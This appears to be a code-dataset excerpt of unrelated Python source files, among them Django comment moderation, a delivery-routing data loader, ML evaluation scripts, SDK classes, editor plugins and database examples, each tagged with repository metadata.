flag, created = models.CommentFlag.objects.get_or_create(
comment=comment,
user=request.user,
flag=models.CommentFlag.SUGGEST_REMOVAL
)
signals.comment_was_flagged.send(
sender=comment.__class__,
comment=comment,
flag=flag,
created=created,
request=request,
)
def perform_delete(request, comment):
flag, created = models.CommentFlag.objects.get_or_create(
comment=comment,
user=request.user,
flag=models.CommentFlag.MODERATOR_DELETION
)
comment.is_removed = True
comment.save()
signals.comment_was_flagged.send(
sender=comment.__class__,
comment=comment,
flag=flag,
created=created,
request=request,
)
def perform_approve(request, comment):
flag, created = models.CommentFlag.objects.get_or_create(
comment=comment,
user=request.user,
flag=models.CommentFlag.MODERATOR_APPROVAL,
)
comment.is_removed = False
comment.is_public = True
comment.save()
signals.comment_was_flagged.send(
sender=comment.__class__,
comment=comment,
flag=flag,
created=created,
request=request,
)
| 2.125 | 2 |
wgups/data/data_loader.py | IMax153/wgups_C950 | 2 | 12761582 | <reponame>IMax153/wgups_C950
from __future__ import annotations
from datetime import timedelta
from json import load
from os import path
from typing import Any, Mapping
from wgups.structures.clock import Clock
from wgups.structures.hash_set import HashSet
from wgups.routing.package import Package
Distances = HashSet[str, HashSet[str, str]]
Packages = HashSet[int, Package]
Prompts = HashSet[str, str]
class DataLoader:
"""A class for loading external data into the application. Utilizes a cache to ensure
that data is ever only loaded once.
Class Attributes
----------------
cache : HashSet[str, Any]
The cache which handles storing file data.
"""
cache = HashSet[str, Any]()
@classmethod
def load_json(cls, filename) -> Mapping[Any, Any]:
"""Attempts to retrieve the file from the cache. Loads the file data if it is not
present in the cache.
Returns
-------
Mapping[Any, Any]
The JSON file data.
Space Complexity
---------------
O(n)
Time Complexity
---------------
O(n)
"""
file_path = path.join(path.dirname(__file__), filename)
with open(file_path, 'r') as file:
return load(file)
@classmethod
def get_packages(cls) -> Packages:
"""Attempts to retrieve the packages from the cache. Loads the package data from a file
if it is not present in the cache.
Returns
-------
HashSet[int, str]
The mapping of package identifiers to package objects.
Space Complexity
---------------
O(n)
Time Complexity
---------------
O(n)
"""
if 'packages' not in cls.cache:
cls.cache.set('packages', cls.load_packages())
return cls.cache.get('packages')
@classmethod
def load_packages(cls) -> Packages:
"""Loads the package data from a file.
Returns
-------
HashSet[int, str]
The mapping of package identifiers to package objects.
Space Complexity
---------------
O(n)
Time Complexity
---------------
O(n)
"""
data = cls.load_json('data/package_data.json')
size = len(data)
packages = HashSet(size)
for key, value in data.items():
identifier = int(key)
(hours, minutes) = map(int, value['deadline'].split(':'))
deadline = Clock(hours, minutes)
package = Package(
identifier,
value['address'],
value['city'],
value['state'],
value['zip'],
value['kg'],
deadline,
)
# Delayed packages - will not arrive at depot until 09:05
if package.id in [6, 25, 28, 32]:
package.arrival_time = Clock(9, 5)
# Incorrect address - will be corrected at 10:20
if package.id == 9:
package.street = '410 S State St'
package.arrival_time = Clock(10, 20)
# Package must be delivered via truck two
if package.id in [3, 18, 36, 38]:
package.deliverable_by = [2]
package.is_priority = True
# Package must be delivered with linked packages
if package.id in [13, 14, 15, 16, 19, 20]:
package.linked = True
package.is_priority = True
packages.set(identifier, package)
return packages
@classmethod
def get_distances(cls) -> Distances:
"""Attempts to retrieve the distances from the cache. Loads the distance data from a file
if it is not present in the cache.
Returns
-------
HashSet[str, HashSet[str, str]]
The mapping of from and to addresses and the corresponding distance between them.
Space Complexity
---------------
O(n)
Time Complexity
---------------
O(n)
"""
if 'distances' not in cls.cache:
cls.cache.set('distances', cls.load_distances())
return cls.cache.get('distances')
@classmethod
def load_distances(cls) -> Distances:
"""Loads the distance data from a file.
Returns
-------
HashSet[str, HashSet[str, str]]
The mapping of from and to addresses and the corresponding distance between them.
Space Complexity
---------------
O(n)
Time Complexity
---------------
O(n)
"""
data = cls.load_json('data/distance_data.json')
size = len(data)
distances = HashSet(size)
for from_address, destinations in data.items():
if from_address not in distances:
distances.set(from_address, HashSet(size))
for to_address, miles in destinations.items():
distances.get(from_address).set(to_address, miles)
return distances
@classmethod
def get_prompts(cls) -> Prompts:
"""Attempts to retrieve the prompts from the cache. Loads the prompt data from a file
if it is not present in the cache.
Returns
-------
HashSet[str, str]
The mapping of prompt names to prompt values.
Space Complexity
---------------
O(n)
Time Complexity
---------------
O(n)
"""
if 'prompts' not in cls.cache:
cls.cache.set('prompts', cls.load_prompts())
return cls.cache.get('prompts')
@classmethod
def load_prompts(cls) -> Prompts:
"""Loads the prompt data from a file.
Returns
-------
HashSet[str, str]
The mapping of prompt names to prompt values.
Space Complexity
---------------
O(n)
Time Complexity
---------------
O(n)
"""
data = cls.load_json('data/prompts.json')
size = len(data)
prompts = HashSet(size)
for key, value in data.items():
prompts.set(key, value)
return prompts
| 2.46875 | 2 |
RUNFILE.py | AbhilashPal/IETHackathon18 | 0 | 12761583 | <gh_stars>0
import py1
py1.func1()
| 1.007813 | 1 |
scripts/parse_state_file.py | COMSYS/coinprune | 3 | 12761584 | #!/usr/bin/env python3
import argparse
import binascii
import struct
def get_state_height(file_handler):
res = file_handler.read(4)
res = struct.unpack('I', res)[0]
return res
def get_block_hash(file_handler):
res = file_handler.read(32)[::-1]
res = binascii.hexlify(res).decode('utf-8')
return res
def get_num_chunks(file_handler):
res = file_handler.read(4)
res = struct.unpack('I', res)[0]
return res
if __name__ == '__main__':
argparser = argparse.ArgumentParser()
argparser.add_argument('filename', type=str, help='Name of the state file to load')
args = argparser.parse_args()
with open(args.filename, 'rb') as f:
state_height = get_state_height(f)
state_latest_block_hash = get_block_hash(f)
state_num_chunks = get_num_chunks(f)
print('State file name: {}'.format(args.filename))
print('')
print('State block height: {}'.format(state_height))
print('Latest block hash: {}'.format(state_latest_block_hash))
print('Number chunks: {}'.format(state_num_chunks))
| 3.0625 | 3 |
DateTime/TimeExample1.py | suprit08/PythonAssignments | 0 | 12761585 | #TimeExample1.py
import time
#Printing the no.of ticks spent since 12AM, 1st January 1970
print("No.of total ticks since 1970 : ",time.time()) | 2.71875 | 3 |
demo/unstructured_prune/evaluate.py | zzjjay/PaddleSlim | 0 | 12761586 | <filename>demo/unstructured_prune/evaluate.py
import os
import sys
import logging
import paddle
import argparse
import functools
import math
import time
import numpy as np
import paddle.fluid as fluid
sys.path.append(os.path.join(os.path.dirname("__file__"), os.path.pardir))
from paddleslim.prune.unstructured_pruner import UnstructuredPruner
from paddleslim.common import get_logger
import models
from utility import add_arguments, print_arguments
import paddle.vision.transforms as T
_logger = get_logger(__name__, level=logging.INFO)
parser = argparse.ArgumentParser(description=__doc__)
add_arg = functools.partial(add_arguments, argparser=parser)
# yapf: disable
add_arg('batch_size', int, 64, "Minibatch size.")
add_arg('use_gpu', bool, True, "Whether to use GPU or not.")
add_arg('model', str, "MobileNet", "The target model.")
add_arg('pruned_model', str, "models", "Whether to use pretrained model.")
add_arg('data', str, "mnist", "Which data to use. 'mnist' or 'imagenet'.")
add_arg('log_period', int, 100, "Log period in batches.")
# yapf: enable
model_list = models.__all__
def compress(args):
train_reader = None
test_reader = None
if args.data == "mnist":
transform = T.Compose([T.Transpose(), T.Normalize([127.5], [127.5])])
train_dataset = paddle.vision.datasets.MNIST(
mode='train', backend="cv2", transform=transform)
val_dataset = paddle.vision.datasets.MNIST(
mode='test', backend="cv2", transform=transform)
class_dim = 10
image_shape = "1,28,28"
elif args.data == "imagenet":
import imagenet_reader as reader
train_dataset = reader.ImageNetDataset(mode='train')
val_dataset = reader.ImageNetDataset(mode='val')
class_dim = 1000
image_shape = "3,224,224"
else:
raise ValueError("{} is not supported.".format(args.data))
image_shape = [int(m) for m in image_shape.split(",")]
assert args.model in model_list, "{} is not in lists: {}".format(args.model,
model_list)
places = paddle.static.cuda_places(
) if args.use_gpu else paddle.static.cpu_places()
place = places[0]
exe = paddle.static.Executor(place)
image = paddle.static.data(
name='image', shape=[None] + image_shape, dtype='float32')
label = paddle.static.data(name='label', shape=[None, 1], dtype='int64')
batch_size_per_card = int(args.batch_size / len(places))
valid_loader = paddle.io.DataLoader(
val_dataset,
places=place,
feed_list=[image, label],
drop_last=False,
return_list=False,
use_shared_memory=True,
batch_size=batch_size_per_card,
shuffle=False)
# model definition
model = models.__dict__[args.model]()
out = model.net(input=image, class_dim=class_dim)
cost = paddle.nn.functional.loss.cross_entropy(input=out, label=label)
avg_cost = paddle.mean(x=cost)
acc_top1 = paddle.metric.accuracy(input=out, label=label, k=1)
acc_top5 = paddle.metric.accuracy(input=out, label=label, k=5)
val_program = paddle.static.default_main_program().clone(for_test=True)
exe.run(paddle.static.default_startup_program())
if args.pruned_model:
def if_exist(var):
return os.path.exists(os.path.join(args.pruned_model, var.name))
_logger.info("Load pruned model from {}".format(args.pruned_model))
paddle.fluid.io.load_vars(exe, args.pruned_model, predicate=if_exist)
def test(epoch, program):
acc_top1_ns = []
acc_top5_ns = []
_logger.info("The current density of the inference model is {}%".format(
round(100 * UnstructuredPruner.total_sparse(
paddle.static.default_main_program()), 2)))
for batch_id, data in enumerate(valid_loader):
start_time = time.time()
acc_top1_n, acc_top5_n = exe.run(
program, feed=data, fetch_list=[acc_top1.name, acc_top5.name])
end_time = time.time()
if batch_id % args.log_period == 0:
_logger.info(
"Eval epoch[{}] batch[{}] - acc_top1: {}; acc_top5: {}; time: {}".
format(epoch, batch_id,
np.mean(acc_top1_n),
np.mean(acc_top5_n), end_time - start_time))
acc_top1_ns.append(np.mean(acc_top1_n))
acc_top5_ns.append(np.mean(acc_top5_n))
_logger.info("Final eval epoch[{}] - acc_top1: {}; acc_top5: {}".format(
epoch,
np.mean(np.array(acc_top1_ns)), np.mean(np.array(acc_top5_ns))))
test(0, val_program)
def main():
paddle.enable_static()
args = parser.parse_args()
print_arguments(args)
compress(args)
if __name__ == '__main__':
main()
| 2.28125 | 2 |
February/Day25-Compare Version Numbers.py | tayyrov/Daily_Coding_Challenge | 1 | 12761587 | """
Question Source:Leetcode
Level: Medium
Topic: String
Solver: Tayyrov
Date: 25.02.2022
"""
def compareVersion(version1: str, version2: str) -> int:
v1 = list(map(int, version1.split(".")))
v2 = list(map(int, version2.split(".")))
dif = abs(len(v1) - len(v2))
extra = [0] * dif
if len(v1) < len(v2):
v1 += extra
else:
v2 += extra
for n1, n2 in zip(v1, v2):
if n1 > n2:
return 1
elif n2 > n1:
return -1
return 0
| 3.296875 | 3 |
library_display.py | hmaerki/openscad_switchbox | 0 | 12761588 | <reponame>hmaerki/openscad_switchbox<filename>library_display.py
from dataclasses import dataclass
from solid import *
from solid.utils import *
@dataclass
class CoreDisplayUsb:
# Space required by Micro USB connector
usb_width = 14
usb_thickness = 10
usb_r = 3
usb_dummy_length = 20
def draw(self):
return rotate([0, 90, 0])(
linear_extrude(height=self.usb_dummy_length)(
offset(r=self.usb_r)(
square(
[
self.usb_width - 2 * self.usb_r,
self.usb_thickness - 2 * self.usb_r,
],
center=True,
)
)
)
)
@dataclass
class CoreDisplay:
glass_thickness = 3
glass_width = 48
glass_height = 20
glass_r = 3
is_top: bool
def draw(self):
display = union()
# Display glass
display += translate(v=[0, self.glass_thickness, 0])(
rotate([90, 0, 0])(
linear_extrude(height=self.glass_thickness)(
offset(r=self.glass_r)(
square(
[
self.glass_width - 2 * self.glass_r,
self.glass_height - 2 * self.glass_r,
],
center=True,
)
)
)
)
)
# PCB
pcb_thickness = 2
pcb_width = 53
pcb_height = 25
display += translate([-pcb_width / 2, self.glass_thickness, -pcb_height / 2])(
cube([pcb_width, pcb_thickness, pcb_height])
)
# Raspberry Pi Board
pi_thickness = 14.3
pi_width = 52
pi_height = 21
display += translate(
[-pi_width / 2, self.glass_thickness + pcb_thickness, -pi_height / 2]
)(cube([pi_width, pi_thickness, pi_height]))
# USB
usb_center_y = 18
display += translate([pi_width / 2, usb_center_y, 0])(CoreDisplayUsb().draw())
if not self.is_top:
# Reset Button
for x in (13, -9):
for z in (-3, -2, -1, 0, 1, 2):
display += translate(v=[x, 25, z])(debug(rotate([90, 0, 0])(cylinder(d=5, h=10))))
return display
SEGMENTS = 100
core_display = CoreDisplay(is_top=False)
scad_render_to_file(
core_display.draw(), file_header=f"$fn = {SEGMENTS};", include_orig_code=True
)
| 2.875 | 3 |
onlinepayments/sdk/domain/mobile_payment_method_specific_input.py | wl-online-payments-direct/sdk-python2 | 0 | 12761589 | <reponame>wl-online-payments-direct/sdk-python2<gh_stars>0
# -*- coding: utf-8 -*-
#
# This class was auto-generated.
#
from onlinepayments.sdk.data_object import DataObject
from onlinepayments.sdk.domain.decrypted_payment_data import DecryptedPaymentData
from onlinepayments.sdk.domain.mobile_payment_product320_specific_input import MobilePaymentProduct320SpecificInput
class MobilePaymentMethodSpecificInput(DataObject):
"""
| Object containing the specific input details for mobile payments
"""
__authorization_mode = None
__decrypted_payment_data = None
__encrypted_payment_data = None
__ephemeral_key = None
__payment_product320_specific_input = None
__payment_product_id = None
__public_key_hash = None
__requires_approval = None
@property
def authorization_mode(self):
"""
| Determines the type of the authorization that will be used. Allowed values:
| * FINAL_AUTHORIZATION - The payment creation results in an authorization that is ready for capture. Final authorizations can't be reversed and need to be captured for the full amount within 7 days.
| * PRE_AUTHORIZATION - The payment creation results in a pre-authorization that is ready for capture. Pre-authortizations can be reversed and can be captured within 30 days. The capture amount can be lower than the authorized amount.
| * SALE - The payment creation results in an authorization that is already captured at the moment of approval.
| Only used with some acquirers, ignored for acquirers that don't support this. In case the acquirer doesn't allow this to be specified the authorizationMode is 'unspecified', which behaves similar to a final authorization.
Type: str
"""
return self.__authorization_mode
@authorization_mode.setter
def authorization_mode(self, value):
self.__authorization_mode = value
@property
def decrypted_payment_data(self):
"""
| The payment data if you do the decryption of the encrypted payment data yourself.
Type: :class:`onlinepayments.sdk.domain.decrypted_payment_data.DecryptedPaymentData`
"""
return self.__decrypted_payment_data
@decrypted_payment_data.setter
def decrypted_payment_data(self, value):
self.__decrypted_payment_data = value
@property
def encrypted_payment_data(self):
"""
| The payment data if we will do the decryption of the encrypted payment data. Typically you'd use encryptedCustomerInput in the root of the create payment request to provide the encrypted payment data instead.
| * For Apple Pay, the encrypted payment data can be found in property data of the PKPayment.token.paymentData property.
Type: str
"""
return self.__encrypted_payment_data
@encrypted_payment_data.setter
def encrypted_payment_data(self, value):
self.__encrypted_payment_data = value
@property
def ephemeral_key(self):
"""
| Ephemeral Key
| A unique generated key used by Apple to encrypt data.
Type: str
"""
return self.__ephemeral_key
@ephemeral_key.setter
def ephemeral_key(self, value):
self.__ephemeral_key = value
@property
def payment_product320_specific_input(self):
"""
| Object containing information specific to Google Pay. Required for payments with product 320.
Type: :class:`onlinepayments.sdk.domain.mobile_payment_product320_specific_input.MobilePaymentProduct320SpecificInput`
"""
return self.__payment_product320_specific_input
@payment_product320_specific_input.setter
def payment_product320_specific_input(self, value):
self.__payment_product320_specific_input = value
@property
def payment_product_id(self):
"""
| Payment product identifier - Please see Products documentation for a full overview of possible values.
Type: int
"""
return self.__payment_product_id
@payment_product_id.setter
def payment_product_id(self, value):
self.__payment_product_id = value
@property
def public_key_hash(self):
"""
| Public Key Hash
| A unique identifier to retrieve key used by Apple to encrypt information.
Type: str
"""
return self.__public_key_hash
@public_key_hash.setter
def public_key_hash(self, value):
self.__public_key_hash = value
@property
def requires_approval(self):
"""
| * true = the payment requires approval before the funds will be captured using the Approve payment or Capture payment API
| * false = the payment does not require approval, and the funds will be captured automatically
Type: bool
"""
return self.__requires_approval
@requires_approval.setter
def requires_approval(self, value):
self.__requires_approval = value
def to_dictionary(self):
dictionary = super(MobilePaymentMethodSpecificInput, self).to_dictionary()
if self.authorization_mode is not None:
dictionary['authorizationMode'] = self.authorization_mode
if self.decrypted_payment_data is not None:
dictionary['decryptedPaymentData'] = self.decrypted_payment_data.to_dictionary()
if self.encrypted_payment_data is not None:
dictionary['encryptedPaymentData'] = self.encrypted_payment_data
if self.ephemeral_key is not None:
dictionary['ephemeralKey'] = self.ephemeral_key
if self.payment_product320_specific_input is not None:
dictionary['paymentProduct320SpecificInput'] = self.payment_product320_specific_input.to_dictionary()
if self.payment_product_id is not None:
dictionary['paymentProductId'] = self.payment_product_id
if self.public_key_hash is not None:
dictionary['publicKeyHash'] = self.public_key_hash
if self.requires_approval is not None:
dictionary['requiresApproval'] = self.requires_approval
return dictionary
def from_dictionary(self, dictionary):
super(MobilePaymentMethodSpecificInput, self).from_dictionary(dictionary)
if 'authorizationMode' in dictionary:
self.authorization_mode = dictionary['authorizationMode']
if 'decryptedPaymentData' in dictionary:
if not isinstance(dictionary['decryptedPaymentData'], dict):
raise TypeError('value \'{}\' is not a dictionary'.format(dictionary['decryptedPaymentData']))
value = DecryptedPaymentData()
self.decrypted_payment_data = value.from_dictionary(dictionary['decryptedPaymentData'])
if 'encryptedPaymentData' in dictionary:
self.encrypted_payment_data = dictionary['encryptedPaymentData']
if 'ephemeralKey' in dictionary:
self.ephemeral_key = dictionary['ephemeralKey']
if 'paymentProduct320SpecificInput' in dictionary:
if not isinstance(dictionary['paymentProduct320SpecificInput'], dict):
raise TypeError('value \'{}\' is not a dictionary'.format(dictionary['paymentProduct320SpecificInput']))
value = MobilePaymentProduct320SpecificInput()
self.payment_product320_specific_input = value.from_dictionary(dictionary['paymentProduct320SpecificInput'])
if 'paymentProductId' in dictionary:
self.payment_product_id = dictionary['paymentProductId']
if 'publicKeyHash' in dictionary:
self.public_key_hash = dictionary['publicKeyHash']
if 'requiresApproval' in dictionary:
self.requires_approval = dictionary['requiresApproval']
return self
| 2.15625 | 2 |
forum/middleware/request_utils.py | Stackato-Apps/osqa | 1 | 12761590 | import forum
from forum.settings import MAINTAINANCE_MODE, APP_LOGO, APP_TITLE
from forum.http_responses import HttpResponseServiceUnavailable
class RequestUtils(object):
def process_request(self, request):
if MAINTAINANCE_MODE.value is not None and isinstance(MAINTAINANCE_MODE.value.get('allow_ips', None), list):
ip = request.META['REMOTE_ADDR']
if not ip in MAINTAINANCE_MODE.value['allow_ips']:
return HttpResponseServiceUnavailable(MAINTAINANCE_MODE.value.get('message', ''))
if request.session.get('redirect_POST_data', None):
request.POST = request.session.pop('redirect_POST_data')
request.META['REQUEST_METHOD'] = "POST"
self.request = request
forum.REQUEST_HOLDER.request = request
return None
def process_response(self, request, response):
forum.REQUEST_HOLDER.request = None
return response
| 2.25 | 2 |
preserialize/deconstructor/builtins.py | jahs/preserialize | 2 | 12761591 | <gh_stars>1-10
import importlib
from .. import Deconstructor, STR
class TypeDeconstructor(Deconstructor):
name = u"type"
def deconstruct(self, obj):
return None, {u"name" : STR(obj.__name__),
u"module" : STR(obj.__module__)}
def construct(self, args, kwargs):
class_name, module_name = kwargs["name"], kwargs["module"]
mod = importlib.import_module(module_name) # package?
return getattr(mod, class_name)
| 2.671875 | 3 |
Lib/site-packages/wx-2.8-msw-unicode/wx/tools/Editra/src/syntax/_actionscript.py | ekkipermana/robotframework-test | 27 | 12761592 | <reponame>ekkipermana/robotframework-test<gh_stars>10-100
###############################################################################
# Name: actionscript.py #
# Purpose: Define ActionScript syntax for highlighting and other features #
# Author: <NAME> <<EMAIL>> #
# Copyright: (c) 2008 <NAME> <<EMAIL>> #
# License: wxWindows License #
###############################################################################
"""
FILE: actionscript.py
AUTHOR: <NAME>
@summary: Lexer configuration file for ActionScript
"""
__author__ = "<NAME> <<EMAIL>>"
__svnid__ = "$Id: _actionscript.py 62364 2009-10-11 01:02:12Z CJP $"
__revision__ = "$Revision: 62364 $"
#-----------------------------------------------------------------------------#
# Imports
import wx.stc as stc
# Local Imports
import synglob
import syndata
import _cpp
#-----------------------------------------------------------------------------#
#---- Keyword Specifications ----#
# ActionScript Keywords 0
AS_KEYWORDS = ("break case catch continue default do each else finally for if "
"in label new return super switch throw while with "
# Attribute Keywords
"dynamic final internal native override private protected "
"public static "
# Definition Keywords
"class const extends function get implements interface "
"namespace package set var "
# Directives
"import include use "
# Primary Expression Keywords
"false null this true "
# Special Types
"void Null *")
# ActionScript Keywords 1
# Namespaces and Packages
AS_TYPES = ("AS3 flash_proxy object_proxy flash accessibility display errors "
"events external filters geom media net printing profiler system "
"text ui utils xml ")
#---- Syntax Style Specs ----#
# Same as cpp
#---- Extra Properties ----#
# Same as cpp
#------------------------------------------------------------------------------#
class SyntaxData(syndata.SyntaxDataBase):
"""ActionScript SyntaxData"""
def __init__(self, langid):
syndata.SyntaxDataBase.__init__(self, langid)
# Setup
self.SetLexer(stc.STC_LEX_CPP)
self.RegisterFeature(synglob.FEATURE_AUTOINDENT, _cpp.AutoIndenter)
def GetKeywords(self):
"""Returns Specified Keywords List
@param lang_id: used to select specific subset of keywords
"""
return [(0, AS_KEYWORDS), (1, AS_TYPES)]
def GetSyntaxSpec(self):
"""Syntax Specifications
@param lang_id: used for selecting a specific subset of syntax specs
"""
return _cpp.SYNTAX_ITEMS
def GetProperties(self):
"""Returns a list of Extra Properties to set
@param lang_id: used to select a specific set of properties
"""
return [_cpp.FOLD, _cpp.FOLD_PRE]
def GetCommentPattern(self):
"""Returns a list of characters used to comment a block of code
@param lang_id: used to select a specific subset of comment pattern(s)
"""
return [u'//']
| 1.875 | 2 |
Lab3/Code/main.py | keithnull/EE101 | 2 | 12761593 | # coding:utf-8
from load_data import load_data, timer
from sklearn.linear_model import LogisticRegression
from sklearn.naive_bayes import GaussianNB
from sklearn.svm import SVC
from sklearn.model_selection import StratifiedShuffleSplit
from sklearn.model_selection import GridSearchCV
import numpy as np
import pandas as pd
@timer
def use_logistic_regression(X_train, y_train, X_test, y_test):
model = LogisticRegression()
print("Start to train a logistic regression model.")
model.fit(X_train, y_train)
score = model.score(X_test, y_test)
print("Score of logistic regression:", score)
@timer
def use_naive_bayes(X_train, y_train, X_test, y_test):
model = GaussianNB()
print("Start to train a naive bayes model.")
model.fit(X_train, y_train)
score = model.score(X_test, y_test)
print("Score of naive bayes:", score)
@timer
def use_SVM(X_train, y_train, X_test, y_test, kernel="linear"):
try:
model = SVC(kernel=kernel, C=10.0, gamma=0.001)
print("Start to train a SVM model(kernel: {0}).".format(kernel))
model.fit(X_train, y_train)
score = model.score(X_test, y_test)
print("Score of SVM(kernel: {0}):".format(kernel), score)
except:
print("Error!")
def optimize_SVM(X_train, y_train, X_test, y_test):
C_range = np.logspace(-4, 3, 8)
gamma_range = np.logspace(-4, 3, 8)
kernel_range = ["linear", "rbf"]
param_grid = dict(gamma=gamma_range, C=C_range, kernel=kernel_range)
grid = GridSearchCV(SVC(),
param_grid=param_grid, n_jobs=-1,)
grid.fit(X_train[:100], y_train[:100])
print("The best parameters are %s with a score of %0.2f"
% (grid.best_params_, grid.best_score_))
if __name__ == '__main__':
X_train, y_train, X_test, y_test = load_data()
#use_logistic_regression(X_train, y_train, X_test, y_test)
#use_naive_bayes(X_train, y_train, X_test, y_test)
SVM_kernels = ["linear", "rbf", "sigmoid"]
for kernel in SVM_kernels:
use_SVM(X_train, y_train, X_test, y_test, kernel)
#optimize_SVM(X_train, y_train, X_test, y_test)
'''Sample Output:
Start to load training data from file.
Runtime:54.356s
Start to load testing data from file.
Runtime:13.156s
Start to load training data from feature file.
Runtime:0.276s
Start to load testinging data from feature file.
Runtime:0.068s
Start to train a logistic regression model.
Score of logistic regression: 0.75
Runtime:0.026s
Start to train a naive bayes model.
Score of naive bayes: 0.720543806647
Runtime:0.016s
Start to train a SVM model(kernel: linear).
Score of SVM(kernel: linear): 0.730362537764
Runtime:6.807s
Start to train a SVM model(kernel: rbf).
Score of SVM(kernel: rbf): 0.690332326284
Runtime:2.324s
Start to train a SVM model(kernel: sigmoid).
Score of SVM(kernel: sigmoid): 0.615558912387
Runtime:1.207s
'''
# The best parameters are {'C': 1, 'gamma': 0.125, 'kernel': 'linear'} with a score of 0.78
| 2.78125 | 3 |
plugins/xml_hidden_extensions_hotfix.py | MattDMo/PackageDev | 288 | 12761594 | <filename>plugins/xml_hidden_extensions_hotfix.py
"""Bootstrap the 'hidden_extensions' setting for the XML syntax.
The XML package includes a `XML.sublime-settings` file
that sets `hidden_extensions` to include some of the extensions
we want to highlight with our package.
There is currently no other way to override this,
so we manually override this extension list
in a User settings file with a plugin.
See also:
https://github.com/sublimehq/Packages/issues/823
https://github.com/SublimeTextIssues/Core/issues/1326
"""
import sublime
from sublime_lib import ResourcePath
__all__ = [
"plugin_loaded",
]
DEFAULT_VALUE = ["rss", "sublime-snippet", "vcproj", "tmLanguage", "tmTheme", "tmSnippet",
"tmPreferences", "dae"]
MODIFIED_VALUE = ["rss", "vcproj", "tmLanguage", "tmTheme", "tmSnippet", "dae"]
# Encode ST build and date of last change (of this file) into the bootstrap value.
# I'm not sure what exactly I'm gonna do with it, so just include info I might find useful later.
BOOTSTRAP_VALUE = [3126, 2017, 3, 13]
def override_extensions(expected, modified):
settings = sublime.load_settings("XML.sublime-settings")
if settings.get('hidden_extensions') == expected:
settings.set('hidden_extensions', modified)
settings.set('package_dev.bootstrapped', BOOTSTRAP_VALUE)
sublime.save_settings("XML.sublime-settings")
print("[PackageDev] Bootstrapped XML's `hidden_extensions` setting")
def remove_override():
settings = sublime.load_settings("XML.sublime-settings")
if settings.get('package_dev.bootstrapped'):
settings.erase('package_dev.bootstrapped')
if settings.get('hidden_extensions') == MODIFIED_VALUE:
settings.erase('hidden_extensions')
print("[PackageDev] Unbootstrapped XML's `hidden_extensions` setting")
sublime.save_settings("XML.sublime-settings")
sublime.set_timeout(remove_file_if_empty, 2000) # Give ST time to write the file
def remove_file_if_empty():
path = ResourcePath("Packages/User/XML.sublime-settings").file_path()
try:
with path.open() as f:
data = sublime.decode_value(f.read())
except (FileNotFoundError, ValueError):
pass
else:
if not data or len(data) == 1 and 'extensions' in data and not data['extensions']:
path.unlink()
print("[PackageDev] Removed now-empty XML.sublime-settings")
def plugin_loaded():
version = int(sublime.version())
if version < 3153:
override_extensions(DEFAULT_VALUE, MODIFIED_VALUE)
# "csproj" was added for 3153.
# https://github.com/sublimehq/Packages/commit/4a3712b7e236f8c4b443282d97bad17f68df318c
# Technically there was a change in 4050, but nobody should be using that anymore.
# https://github.com/sublimehq/Packages/commit/7866273af18398bce324408ff23c7a22f30486c8
elif version < 4075:
override_extensions(DEFAULT_VALUE + ["csproj"], MODIFIED_VALUE + ["csproj"])
elif version >= 4075:
# The settings were move to the syntax file
# https://github.com/sublimehq/Packages/commit/73b16ff196d3cbaf7df2cf5807fda6ab68a2434e
remove_override()
| 2.5625 | 3 |
nr_oai_pmh_harvester/error_handler.py | Narodni-repozitar/oai-pmh-harvester | 0 | 12761595 | <filename>nr_oai_pmh_harvester/error_handler.py<gh_stars>0
import traceback
from oarepo_oai_pmh_harvester.decorators import rule_error_handler
@rule_error_handler("uk", "xoai")
def call_error_handler_uk(el, path, phase, results):
error_handler(el, path, phase, results)
def error_handler(el, path, phase, results):
exc = traceback.format_exc()
if "rulesExceptions" not in results[-1]:
results[-1]["rulesExceptions"] = []
results[-1]["rulesExceptions"].append(
{"path": path, "element": str(el), "phase": phase, "exception": exc})
| 2.3125 | 2 |
DynamoDB/update_item.py | micheusch/sagemaker | 0 | 12761596 | <gh_stars>0
import boto3
dynamodb = boto3.resource('dynamodb', region_name='eu-west-2')
table = dynamodb.Table('Books')
# The UpdateItem API allows you to update a particular item as identified by its key.
resp = table.update_item(
Key={"Author": "<NAME>", "Title": "The Rainmaker"},
# Expression attribute names specify placeholders for attribute names to use in your update expressions.
ExpressionAttributeNames={
"#formats": "Formats",
"#audiobook": "Audiobook",
},
# Expression attribute values specify placeholders for attribute values to use in your update expressions.
ExpressionAttributeValues={
":id": "8WE3KPTP",
},
# UpdateExpression declares the updates you want to perform on your item.
# For more details about update expressions, see https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/Expressions.UpdateExpressions.html
UpdateExpression="SET #formats.#audiobook = :id",
)
| 3.078125 | 3 |
mongodb/demo11.py | silianpan/seal-spider-demo | 0 | 12761597 | import pymongo
client = pymongo.MongoClient(host='localhost', port=27017)
db = client.test
collection = db.students
result = collection.remove({'name': 'Kevin'})
print(result) | 3 | 3 |
c_test_environment/c_index_strings.py | uwescience/raco | 61 | 12761598 | <filename>c_test_environment/c_index_strings.py
import csv
import sys
#TODO take a schema as input
class WordIndexer:
def __init__(self, indexf):
self.words = {}
self.count = 0
self.indexfw = open(indexf, 'w')
def add_word(self, w):
if w in self.words:
return self.words[w]
else:
self.indexfw.write(w+'\n')
t = self.count
self.count += 1
self.words[w] = t
return t
def close(self):
self.indexfw.close()
def indexing(inputf, delim_in):
intfile = inputf + '.i'
indexf = inputf + '.index'
delim_out = ' '
wi = WordIndexer(indexf)
with open(inputf, 'r') as ins:
reader = csv.reader(ins, delimiter=delim_in)
with open(intfile, 'w') as outs:
writer = csv.writer(outs, delimiter=delim_out)
for row in reader:
cols = [wi.add_word(w) for w in row]
writer.writerow(cols)
wi.close()
return intfile, indexf
if __name__ == '__main__':
if len(sys.argv) < 2:
raise Exception("usage: %s inputfile [delim]" % sys.argv[0])
if len(sys.argv) == 3:
delim = sys.argv[2]
else:
delim = ' '
indexing(sys.argv[1], delim_in=delim)
| 3.359375 | 3 |
src/core/uv_edit/helpers/__init__.py | Epihaius/panda3dstudio | 63 | 12761599 | from .grid import Grid
from .trnsf_gizmo import UVTransformGizmo
| 1.03125 | 1 |
ok.py | rahulneal/InterctiveMap | 0 | 12761600 | <filename>ok.py
# -*- coding: utf-8 -*-
"""
Created on Mon Jan 27 22:16:29 2020
@author: ghanta
"""
my_dict={}
filepath = 'output.txt'
with open(filepath) as fp:
line = fp.readline()
cnt = 1
while line:
# print("Line {}: {}".format(cnt, line.strip()))
my_dict[str(line.strip())] = cnt
line = fp.readline()
cnt += 1
print(my_dict)
print("##################################")
def getList(my_dict):
return my_dict.keys()
# Driver program
print(getList(my_dict))
list(my_dict.keys())
| 3.375 | 3 |
